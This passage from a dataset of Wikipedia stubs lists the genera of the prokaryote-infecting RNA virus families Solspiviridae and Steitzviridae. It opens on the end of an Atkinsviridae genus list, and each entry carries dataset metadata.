Sdonativirus
Sdribtuvirus
Shopitevirus
Stupavirus
Tsecebavirus
Wahbolevirus
Wecineivirus
Whodehavirus
Wulosvivirus
Yekorevirus
Yeshinuvirus
References
Virus families
Riboviria | Atkinsviridae | [
"Biology"
] | 254 | [
"Virus stubs",
"Viruses",
"Riboviria"
] |
68,132,216 | https://en.wikipedia.org/wiki/Solspiviridae | Solspiviridae is a family of RNA viruses, which infect prokaryotes.
Taxonomy
Solspiviridae contains 24 genera:
Alohrdovirus
Andihavirus
Dibaevirus
Dilzevirus
Eosonovirus
Etdyvivirus
Fahrmivirus
Hinehbovirus
Insbruvirus
Intasivirus
Jargovirus
Mahshuvirus
Mintinovirus
Odiravirus
Oekfovirus
Puhrivirus
Puirovirus
Sexopuavirus
Thiuhmevirus
Tohkunevirus
Tyrahlevirus
Vendavirus
Voulevirus
Wishivirus
References
Virus families
Riboviria | Solspiviridae | [
"Biology"
] | 128 | [
"Virus stubs",
"Viruses",
"Riboviria"
] |
68,132,262 | https://en.wikipedia.org/wiki/Steitzviridae | Steitzviridae is a family of RNA viruses, which infect prokaryotes.
Taxonomy
Steitzviridae contains 117 genera:
Abakapovirus
Achlievirus
Adahmuvirus
Alehxovirus
Aphenovirus
Arawsmovirus
Arctuvirus
Arpirivirus
Ashcevirus
Bahnicevirus
Belbovirus
Berdovirus
Bicehmovirus
Bidhavirus
Brikhyavirus
Cahrlavirus
Cahtavirus
Catindovirus
Cebevirus
Chlurivirus
Chorovirus
Clitovirus
Cohrdavirus
Controvirus
Cunarovirus
Dohnjavirus
Endehruvirus
Eregrovirus
Erimutivirus
Fagihovirus
Fejonovirus
Ferahgovirus
Fluruvirus
Frobavirus
Fudhoevirus
Gahmegovirus
Garnievirus
Gehrmavirus
Gernuduvirus
Gihfavirus
Gredihovirus
Gulmivirus
Hahkesevirus
Henifovirus
Hohltdevirus
Hohrdovirus
Huhbevirus
Huohcivirus
Huylevirus
Hyjrovirus
Hylipavirus
Iwahcevirus
Jiforsuvirus
Kecijavirus
Kecuhnavirus
Kehruavirus
Kihsiravirus
Kinglevirus
Kyanivirus
Laimuvirus
Lazuovirus
Lehptavirus
Lihvevirus
Limaivirus
Lomnativirus
Loptevirus
Luloavirus
Lygehevirus
Lyndovirus
Mahdsavirus
Mahjnavirus
Metsavirus
Milihnovirus
Minusuvirus
Mocruvirus
Molucevirus
Nehumivirus
Nihlwovirus
Ociwvivirus
Pahspavirus
Patimovirus
Pepusduvirus
Phulihavirus
Pirifovirus
Podtsbuvirus
Pohlodivirus
Psiaduvirus
Psouhdivirus
Puduphavirus
Pujohnavirus
Rodtovirus
Rohsdrivirus
Sdenfavirus
Setohruvirus
Sidiruavirus
Snuwdevirus
Sperdavirus
Stehnavirus
Suhnsivirus
Surghavirus
Tamanovirus
Tehmuvirus
Tehnicivirus
Thehlovirus
Thyrsuvirus
Tikiyavirus
Timirovirus
Tsuhreavirus
Tuskovirus
Tuwendivirus
Vernevirus
Vesehyavirus
Vindevirus
Weheuvirus
Widsokivirus
Yeziwivirus
Zuysuivirus
References
Virus families
Riboviria | Steitzviridae | [
"Biology"
] | 496 | [
"Virus stubs",
"Viruses",
"Riboviria"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.